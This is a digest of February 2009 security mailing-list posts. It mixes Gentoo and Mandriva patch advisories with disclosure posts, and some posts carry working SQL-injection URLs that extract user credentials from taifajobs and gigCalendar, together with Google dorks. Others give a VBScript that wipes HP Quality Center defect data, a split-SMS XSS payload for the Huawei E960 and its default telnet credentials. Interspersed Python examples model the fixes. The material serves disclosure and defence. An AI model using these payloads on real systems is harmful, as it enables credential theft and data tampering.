[ GLSA 200902-06 ] GNU Emacs, XEmacs: Multiple vulnerabilities

2009-02-23 Thread Pierre-Yves Rofes
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200902-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: GNU Emacs, XEmacs: Multiple vulnerabilities
      Date: February 23, 2009
      Bugs: #221197, #236498
        ID: 200902-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Two vulnerabilities were found in GNU Emacs, possibly leading to
user-assisted execution of arbitrary code. One also affects edit-utils
in XEmacs.

Background
==========

GNU Emacs and XEmacs are highly extensible and customizable text
editors. edit-utils are miscellaneous extensions to XEmacs.

Affected packages
=================

    -------------------------------------------------------------------
     Package                  /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  app-editors/emacs            < 22.2-r3               >= 22.2-r3
                                                        *>= 21.4-r17
                                                               < 19
  2  app-xemacs/edit-utils           < 2.39                  >= 2.39
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

Morten Welinder reports about GNU Emacs and edit-utils in XEmacs: By
shipping a .flc accompanying a source file (.c for example) and setting
font-lock-support-mode to fast-lock-mode in the source file through
local variables, any Lisp code in the .flc file is executed without
warning (CVE-2008-2142).

Romain Francoise reported a security risk in a feature of GNU Emacs
related to interacting with Python. The vulnerability arises because
Python, by default, prepends the current directory to the module search
path, allowing for arbitrary code execution when launched from a
specially crafted directory (CVE-2008-3949).

Impact
======

Remote attackers could entice a user to open a specially crafted file
in GNU Emacs, possibly leading to the execution of arbitrary Emacs Lisp
code or arbitrary Python code with the privileges of the user running
GNU Emacs or XEmacs.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All GNU Emacs users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-editors/emacs-22.2-r3"

All edit-utils users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-xemacs/edit-utils-2.39"

References
==========

  [ 1 ] CVE-2008-2142
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2142
  [ 2 ] CVE-2008-3949
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3949

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200902-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5







[ MDVSA-2009:051 ] libpng

2009-02-23 Thread security


 ___

 Mandriva Linux Security Advisory MDVSA-2009:051
 http://www.mandriva.com/security/
 ___

 Package : libpng
 Date: February 23, 2009
 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0,
   Multi Network Firewall 2.0
 ___

 Problem Description:

 A number of vulnerabilities have been found and corrected in libpng:
 
 Fixed a 1-byte buffer overflow in pngpread.c (CVE-2008-3964). This was
 already fixed in Mandriva Linux 2009.0.
 
 Fixed the function png_check_keyword(), which allowed setting arbitrary
 bytes in the process memory to 0 (CVE-2008-5907).
 
 Fixed a potential DoS (Denial of Service) or compromise of an
 application using the library (CVE-2009-0040).
 
 The updated packages have been patched to prevent this.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3964
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5907
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0040
 ___

 Updated Packages:


[ GLSA 200902-05 ] KTorrent: Multiple vulnerabilities

2009-02-23 Thread Pierre-Yves Rofes
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200902-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: KTorrent: Multiple vulnerabilities
      Date: February 23, 2009
      Bugs: #244741
        ID: 200902-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Two vulnerabilities in the web interface plugin in KTorrent allow for
remote execution of code and arbitrary torrent uploads.

Background
==========

KTorrent is a BitTorrent program for KDE.

Affected packages
=================

    -------------------------------------------------------------------
     Package                  /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  net-p2p/ktorrent               < 2.2.8                  >= 2.2.8

Description
===========

The web interface plugin does not restrict access to the torrent upload
functionality (CVE-2008-5905) and does not sanitize request parameters
properly (CVE-2008-5906).

Impact
======

A remote attacker could send specially crafted parameters to the web
interface that would allow for arbitrary torrent uploads and remote
code execution with the privileges of the KTorrent process.

Workaround
==========

Disabling the web interface plugin will prevent exploitation of both
issues. Click "Plugins" in the configuration menu and uncheck the
checkbox left of "WebInterface", then apply the changes.

Resolution
==========

All KTorrent users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-p2p/ktorrent-2.2.8"

References
==========

  [ 1 ] CVE-2008-5905
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5905
  [ 2 ] CVE-2008-5906
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5906

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200902-05.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5






[ MDVSA-2009:050-1 ] python-pycrypto

2009-02-23 Thread security


 ___

 Mandriva Linux Security Advisory   MDVSA-2009:050-1
 http://www.mandriva.com/security/
 ___

 Package : python-pycrypto
 Date: February 23, 2009
 Affected: 2009.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in the PyCrypto
 ARC2 module 2.0.1, which allows remote attackers to cause a denial
 of service and possibly execute arbitrary code via a large ARC2 key
 length (CVE-2009-0544).
 
 The updated packages have been patched to prevent this.

 Update:

 The previous update package was not signed.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0544
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  



[ECHO_ADV_103$2009] taifajobs <= 1.0 (jobid) Remote SQL Injection Vulnerability

2009-02-23 Thread adv
ECHO_ADV_103$2009

-
[ECHO_ADV_103$2009] taifajobs <= 1.0 (jobid) Remote SQL Injection Vulnerability
-

Author       : K-159
Date         : February 23, 2009
Location     : Jakarta, Indonesia
Web          : http://e-rdc.org/v1/news.php?readmore=126
Critical Lvl : Medium
Impact       : Manipulation of data / Exposure of sensitive information
Where        : From Remote
---

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : taifajobs
Version     : <= 1.0
Vendor      : http://sourceforge.net/projects/taifajobs
Description :

In the job recruitment system, job seekers and recruiters post their details.
Job seekers create an online resume on their profiles, and recruiters can add
the organization's information and post and manage job advertisements and
applications.

---

Vulnerability:
~~~~~~~~~~~~~~

Input passed to the "jobid" parameter in the jobdetails.php page is not properly
verified before being used in SQL queries. This vulnerability can be exploited
to manipulate SQL queries by injecting arbitrary SQL code.

Successful exploitation allows an attacker to retrieve users' email, login name
and MD5 password hash.


Poc/Exploit:
~~~~~~~~~~~~

http://www.example.com/[path]/jobdetails.php?jobid=-5 union select 
1,2,3,4,5,6,concat(admin,0x3a,email,0x3a,loginname,0x3a,pass),8,9,0,1,2,3,4,5,6,7,8,9,0
 from users--

Dork:
~~~~~
Google : N/A


Solution:
~~~~~~~~~

- Edit the source code to ensure that input is properly verified.

Timeline:
~~~~~~~~~

- 12 - 02 - 2009 bug found
- 13 - 02 - 2009 vendor contacted but no response
- 23 - 02 - 2009 advisory released
---

Shoutz:
~~~~~~~
~ ping - my dearest wife, zautha - my beloved son, and my next beloved daughter 
"welcome to the world".
~ y3dips,the_day (congratz for the 
baby),Negatif,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,
the_hydra,neng chika, str0ke
~ scanners [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ SK,Abond,pokley,cybertank, 
super_temon,whatsoever,b120t0,inggar,fachri,adi,rahmat,indra
~ 
masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b,cR4SH3R,ogeb,bagan,devsheed
~ dr188le,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,ghostblup,shamus,
kuntua, stev_manado,nofry,k1tk4t,0pt1c,k1ngk0ng
~ newbie_hac...@yahoogroups.com
~ milw0rm.com, macaholic.info, unitiga.com, mac.web.id, indowebster.com
~ #aikmel #e-c-h-o @irc.dal.net

---
Contact:
~~~~~~~~

K-159 || echo|staff || adv[at]e-rdc[dot]org
Homepage: http://www.e-rdc.org/

 [ EOF ] --


HP Quality Center vulnerability

2009-02-23 Thread info
Find below the details of a vulnerability in the HP Quality Center product 
(formerly Mercury Quality Center).

Introduction
------------

Quality Center (QC) is a web-based QA testing and management tool. It became an 
HP product when HP took over Mercury Interactive last year.

The front-end of the application is composed of COM components that plug into 
the web browser. Quality Center provides a customization capability (called 
workflow) which allows the administrator to modify the default behavior. This 
workflow is driven by VBScript functions that are called whenever a particular 
event occurs on the client front-end.

In order to optimize the interaction speed of the application, a cache folder 
is created on the client machine. By default, this folder is located at 
%tmp%/TD_80. Whenever a user connects to a Quality Center project, 2 folders 
are created within the cache folder. One of these folders contains a copy of the 
workflow scripts used to customize the application. Indeed, those files are 
required on the client machine because the workflow is executed on the client, 
not on the server.

There exists 1 VBScript workflow file per feature. Those are:
* Login/Logout (common.tds)
* Defects module (defects.tds)
* Manual Test Execution (manrun.tds)
* Test Requirements module (req.tds)
* Test Lab module (testlab.tds)
* Test Plan module (testplan.tds)

The customization feature of Quality Center is often used for:
* Controlling password compliance (no blank password, more than 8 letters, 
etc.)
* Chained lists (when a value is selected in a field, another field gets 
updated with a list relevant to that value)
* Automatic updates to some QC components (Test, Test Set, Defect objects, 
hidden fields)
* Hiding information depending on the user's group (used when a project is 
shared with different vendors)
* Others

The workflow is often driven by using the OTA (Open Test Architecture), the 
Quality Center API. This API allows the manipulation of any QC object (e.g. 
Subject folder, Test/Defect objects, Fields, etc.). It also allows the direct 
manipulation of the database used by Quality Center.

Issue
-----

When a user connects to Quality Center, the cache folder is automatically 
updated with the latest VBScript workflow files. Those files are then read by 
the QC front-end only once for the whole session. They are then used by the 
application whenever the associated events are raised.

There are 2 main points that make this workflow highly vulnerable:
1. Those files are written in plain text;
2. Marking those files as read-only (through the file properties) will 
prevent Quality Center from overwriting them.

If a user modifies this file and then marks it as read-only, he can execute 
arbitrary code. As the OTA API allows access to the database, he can also 
modify the data stored in the database as follows:
* Quality Center 9.2 (Unconfirmed)
  - Severity High: user has higher capability than defined by their 
profile
* Quality Center 9.0 Patch < 17
  - Severity Highly Critical: a user (even with a Viewer profile) can 
amend the data rendering it useless. He will also have higher capability than 
defined by their profile
* Quality Center 8.2 / 8.0 (Unconfirmed)
  - Severity Highly Critical: a user (even with a Viewer profile) can 
amend the data rendering it useless. He will also have higher capability than 
defined by their profile
* TestDirector (Any Version)
  - TestDirector is the former name of Quality Center
  - Potentially the same issues as for Quality Center 9.0 Patch < 17

Please note that HP has released a patch that fixes this issue, please contact 
HP support for further details.

Example
-------

This really short example shows how a user can simply change the content of all 
the defects to some meaningless values:

    Sub Defects_Bug_MoveTo
        Set objCommand = TDConnection.Command
        objCommand.CommandText = "UPDATE BUG SET BG_SUMMARY='Useless', BG_DESCRIPTION='Useless'"
        objCommand.Execute
    End Sub

Other Information
-----------------

Discovered By: Exposit Limited
Internet:      http://www.exposit.co.uk

Exposit Limited is a functional testing consultancy company specialized in HP 
(formerly Mercury) Testing Tools.


gigCalendar 1.0 (venuedetails.php) Joomla Component SQL Injection

2009-02-23 Thread Salvatore "drosophila" Fresta
***   Salvatore "drosophila" Fresta   ***


Application:    gigCalendar Joomla Component 1.0
                http://joomlacode.org/gf/project/gigcalendar/
Version:        gigCalendar 1.0
Bug:            * SQL Injection
Exploitation:   Remote
Dork:           inurl:"index.php?option=com_gigcal"
Date:           21 Feb 2009
Discovered by:  Salvatore "drosophila" Fresta
Author:         Salvatore "drosophila" Fresta
e-mail:         drosophila...@gmail.com


*

- BUGS

SQL Injection:

Requisites: magic_quotes_gpc = off

File affected: venuedetails.php

This bug allows a guest to view username and
password of a registered user.


http://www.site.com/path/index.php?option=com_gigcal&task=details&gigcal_venues_id=-1'
UNION ALL SELECT 1,concat('username: ',
username),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat('password:
', password),NULL,NULL,NULL,NULL,NULL,NULL FROM jos_users%23

*

-- 
Salvatore "drosophila" Fresta
CWNP444351


XSS Attack using SMS to Optus/Huawei E960 HSDPA Router

2009-02-23 Thread rizki . wicaksono
XSS Attack using SMS to Optus/Huawei E960 HSDPA Router

Synopsis
--------

Huawei E960 HSDPA Router (firmware version 246.11.04.11.110sp04) is vulnerable 
to an XSS attack using SMS. One of the features of this router is the ability to 
send and receive SMS through its web interface. The SMS text is presented 
unescaped/unfiltered in the inbox view, and an attacker can craft malicious 
short messages to gain control over the victim's router.

Details
-------
The first 32 characters of every incoming SMS are presented in unescaped form in 
the inbox view. The 32-character limit can be overcome by using several 
messages and inserting a JavaScript comment to merge the current message with 
the next one. 

Example:

The first message ends with /*, which will comment out all the HTML code up to 
the second message:

alert('hello '/*

and the second message will start with */ that will close the comment and 
continue the script:

*/+'world');

Note that the newest message is presented first, so the order of SMS sending 
must be reversed.

Impact
------
An attacker can 
- get victim's PPP password by accessing /js/connection.js
- disconnect victim's internet connection
- send SMS with victim's router
- gain access to victim's WIFI password

Recovery
--------
After an attack is performed, the inbox page cannot be used to delete the 
received messages (because the delete button doesn't work anymore). To remove 
offending messages from the inbox, telnet to the router with username 'admin' 
and password 'admin'. The Huawei E960 uses a BusyBox shell, so the standard rm 
command can be used to remove the messages (they are located at 
/tmp/sms/inbox_sms). After removing the message content, the deleted messages 
will still be in the inbox index, but they can now be removed from the inbox page.


Credits
-------
Rizki Wicaksono (www.ilmuhacking.com) found this vulnerability. The Indonesian 
article at 
http://www.ilmuhacking.com/web-security/xss-attack-using-sms-huawei-e960-hsdpa-router/
gives more detail about this vulnerability. This English translation/summary 
was done by Yohanes Nugroho.
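As an added illustration of the inbox behaviour described in the post above (example code written for this digest, not the router's firmware or the researcher's code), the model below renders messages newest first, 32 characters each, with and without HTML escaping. Wrapping the two quoted fragments in <script> tags is an assumption, since the post does not show how the script context is opened.

```python
import html
import re

PREVIEW_LEN = 32  # the inbox view shows only this many characters per SMS


def render_inbox(messages_in_sending_order, escape):
    """Model of the inbox view the post describes: newest message first,
    only the first 32 characters of each, dropped into the page as-is when
    escape is False (the reported behaviour) or HTML-escaped when True.
    Returns the HTML fragment the page would contain."""
    cells = []
    for text in reversed(messages_in_sending_order):
        preview = text[:PREVIEW_LEN]
        if escape:
            # Escaping turns '<' into '&lt;' and quotes into entities, so no
            # message can open a script element or break out of its cell.
            preview = html.escape(preview, quote=True)
        cells.append("<td>" + preview + "</td>")
    return "\n".join(cells)


def script_seen_by_browser(page):
    """Body of the first raw <script> element with /* ... */ comments removed,
    i.e. roughly what a browser would execute. Returns None when the page
    contains no raw script element, which is the state the escaped render
    must be in. Shows why per-message truncation is not a defence: the
    comment spans the table markup between two previews."""
    m = re.search(r"<script>(.*?)</script>", page, flags=re.S)
    if m is None:
        return None
    return re.sub(r"/\*.*?\*/", "", m.group(1), flags=re.S)


# Constructed messages, in sending order. The two fragments are the ones the
# post quotes; the <script> tags around them are assumed. Each fits in 32
# characters, and the fragment that must appear first on the page is sent
# last, because the inbox lists the newest message first.
SENT_IN_ORDER = [
    "*/+'world');</script>",
    "<script>alert('hello '/*",
]
```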


gigCalendar 1.0 (banddetails.php) Joomla Component SQL Injection

2009-02-23 Thread Salvatore "drosophila" Fresta
***   Salvatore "drosophila" Fresta   ***


Application:    gigCalendar Joomla Component 1.0
                http://joomlacode.org/gf/project/gigcalendar/
Version:        gigCalendar 1.0
Bug:            * SQL Injection
Exploitation:   Remote
Dork:           inurl:"index.php?option=com_gigcal"
Date:           21 Feb 2009
Discovered by:  Salvatore "drosophila" Fresta
Author:         Salvatore "drosophila" Fresta
e-mail:         drosophila...@gmail.com


*

- BUGS

SQL Injection:

Requisites: magic_quotes_gpc = off

File affected: banddetails.php

This bug allows a guest to view username and
password of a registered user.


http://www.site.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1'
UNION ALL SELECT 1,2,3,4,5,concat('username: ',
username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL
FROM jos_users%23

*

-- 
Salvatore "drosophila" Fresta
CWNP444351


gigCalendar Joomla Component 1.0 SQL Injection

2009-02-23 Thread Salvatore "drosophila" Fresta
***   Salvatore "drosophila" Fresta   ***


Application:    gigCalendar Joomla Component 1.0
                http://joomlacode.org/gf/project/gigcalendar/
Version:        gigCalendar 1.0
Bug:            * SQL Injection
Exploitation:   Remote
Dork:           inurl:"index.php?option=com_gigcal"
Date:           21 Feb 2009
Discovered by:  Salvatore "drosophila" Fresta
Author:         Salvatore "drosophila" Fresta
e-mail:         drosophila...@gmail.com


*

- BUGS

SQL Injection:

Requisites: magic_quotes_gpc = off

File affected: banddetails.php

This bug allows a guest to view username and
password of a registered user.


http://www.site.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1'
UNION ALL SELECT 1,2,3,4,5,concat('username: ',
username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL
from jos_users%23

*

-- 
Salvatore "drosophila" Fresta
CWNP444351
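The taifajobs (jobid) and gigCalendar (gigcal_venues_id, gigcal_bands_id) posts above report the same defect, an id parameter pasted into a query string, and the taifajobs solution section asks for input verification as the fix. The sqlite3 model below is an added example written for this digest, not either project's code; its tables and column counts are constructed and smaller than the real schemas, and the quoted gigCalendar variant (`-1'...`) is rejected by the same check.

```python
import re
import sqlite3


def build_db():
    """Constructed stand-in for the applications' tables; column counts are
    smaller than the real schemas the posts enumerate."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE jobs  (jobid INTEGER PRIMARY KEY, title TEXT, location TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, loginname TEXT, pass TEXT);
        INSERT INTO jobs  VALUES (5, 'Tester', 'Jakarta');
        INSERT INTO users VALUES (1, 'admin', 'md5-hash-placeholder');
    """)
    return db


def jobdetails_vulnerable(db, jobid):
    """The reported defect: the request parameter is concatenated into the
    SQL text, so a value like "-5 union select ..." rewrites the query and
    the page shows rows from a table it was never meant to read."""
    sql = "SELECT jobid, title, location FROM jobs WHERE jobid=" + jobid
    return db.execute(sql).fetchall()


def jobdetails_fixed(db, jobid):
    """The 'verify input' fix, done in two layers: reject anything that is not
    an integer id, then bind the value as a parameter so the driver never
    treats it as SQL. Either layer alone would stop the quoted payloads;
    together they also catch values the first layer lets through."""
    if re.fullmatch(r"-?\d+", jobid) is None:
        raise ValueError("jobid must be an integer")
    sql = "SELECT jobid, title, location FROM jobs WHERE jobid=?"
    return db.execute(sql, (int(jobid),)).fetchall()


def fixed_rejects(db, value):
    """True if jobdetails_fixed refuses value instead of running it."""
    try:
        jobdetails_fixed(db, value)
    except ValueError:
        return True
    return False
```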


[ MDVSA-2009:050 ] python-pycrypto

2009-02-23 Thread security


 ___

 Mandriva Linux Security Advisory MDVSA-2009:050
 http://www.mandriva.com/security/
 ___

 Package : python-pycrypto
 Date: February 20, 2009
 Affected: 2009.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in the PyCrypto
 ARC2 module 2.0.1, which allows remote attackers to cause a denial
 of service and possibly execute arbitrary code via a large ARC2 key
 length (CVE-2009-0544).
 
 The updated packages have been patched to prevent this.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0544
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  



[ MDVSA-2009:049 ] pycrypto

2009-02-23 Thread security


 ___

 Mandriva Linux Security Advisory MDVSA-2009:049
 http://www.mandriva.com/security/
 ___

 Package : pycrypto
 Date: February 20, 2009
 Affected: 2008.0, 2008.1, 2009.0, Corporate 4.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in the PyCrypto
 ARC2 module 2.0.1, which allows remote attackers to cause a denial
 of service and possibly execute arbitrary code via a large ARC2 key
 length (CVE-2009-0544).
 
 The updated packages have been patched to prevent this.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0544
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  



[ MDVSA-2009:048 ] epiphany

2009-02-23 Thread security


 ___

 Mandriva Linux Security Advisory MDVSA-2009:048
 http://www.mandriva.com/security/
 ___

 Package : epiphany
 Date: February 20, 2009
 Affected: 2008.1, 2009.0
 ___

 Problem Description:

 Python has a variable called sys.path that contains all paths from
 which Python loads modules when a script uses import. Incorrect
 handling of that variable enables local attackers to execute arbitrary
 code via Python scripting in the current Epiphany working directory
 (CVE-2008-5985).
 
 This update provides a fix for that vulnerability.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5985
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
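CVE-2008-3949 (GLSA 200902-06, GNU Emacs) and CVE-2008-5985 (MDVSA-2009:048, Epiphany) above both come down to the directory an application was started from sitting at the front of Python's sys.path, so a file planted there wins every import lookup. The check below is an added example, not code from either project or distribution; the module name emacs_helper and the directory layout are constructed, and nothing planted is ever imported or executed.

```python
import importlib.machinery
import os
import tempfile


def cwd_entries(path_entries, cwd):
    """Return the entries of a sys.path-style list that resolve to cwd.

    Python spells "the current directory" as '' or '.', and an application
    may also have inserted the absolute path itself; all three are caught by
    joining each entry onto cwd (an absolute entry discards cwd) and
    comparing the resolved result with cwd.
    """
    target = os.path.realpath(cwd)
    return [e for e in path_entries
            if os.path.realpath(os.path.join(cwd, e)) == target]


def hardened_path(path_entries, cwd):
    """path_entries with every cwd-resolving entry removed, order preserved.
    This is the state an embedding application wants before it imports its
    own helper modules from a directory a user or document chose."""
    drop = set(cwd_entries(path_entries, cwd))
    return [e for e in path_entries if e not in drop]


def find_origin(module_name, path_entries):
    """File the import system would load module_name from, using the stdlib
    path finder on exactly the given entries. Only the lookup is performed;
    the module is not imported."""
    spec = importlib.machinery.PathFinder.find_spec(module_name, path_entries)
    return None if spec is None else spec.origin


def demo_shadowing(module_name="emacs_helper"):
    """Constructed scenario: a file named like a helper the application
    imports is planted in the directory it was started from, and that
    directory is first on the path. Returns (planted_file_wins_before,
    lookup_fails_after), expected (True, True)."""
    with tempfile.TemporaryDirectory() as untrusted_dir:
        planted = os.path.join(untrusted_dir, module_name + ".py")
        with open(planted, "w") as fh:
            fh.write("# planted file; this demo never executes it\n")
        # The path as the embedding application would see it (constructed):
        # its working directory first, then a stand-in for the library dir.
        path = [untrusted_dir, os.path.dirname(os.__file__)]
        before = find_origin(module_name, path)
        after = find_origin(module_name, hardened_path(path, cwd=untrusted_dir))
        return before == planted, after is None
```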